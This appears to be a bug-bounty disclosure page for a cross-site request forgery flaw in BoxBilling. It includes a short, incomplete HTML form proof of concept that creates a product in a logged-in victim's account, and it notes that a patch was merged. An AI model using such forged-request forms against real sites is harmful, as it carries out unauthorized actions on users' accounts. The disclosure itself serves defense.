Cross-Site Request Forgery (CSRF) in boxbilling/boxbilling


Reported on

Apr 26th 2021

✍️ Description


🕵️‍♂️ Proof of Concept

i see whole boxbilling software is vulnerable to csrf bug . There is no protection for csrf attack

the csrf attack poc will be bellow code

<form action="" method="post" id="myForm">
<input type=hidden name=type value="custom">
<input type=hidden name=product_category_id value="1">
<input type=hidden name=title value="csrf">
  <input type="submit" value="Submit">

In this html code change your sitename and save the file as html . Now logged in into boxbilling account and open this file in your same browser and see a product is created using csrf attack every request is vulnerable for csrf attack

💥 Impact


Yağızhan validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Benjamin Aerni submitted a
4 months ago
Benjamin Aerni
4 months ago

Patch has been merged into BoxBilling's master branch

Mr. Timothy G Webb Sr. confirmed that a fix has been merged on 42cde7 4 months ago
Benjamin Aerni has been awarded the fix bounty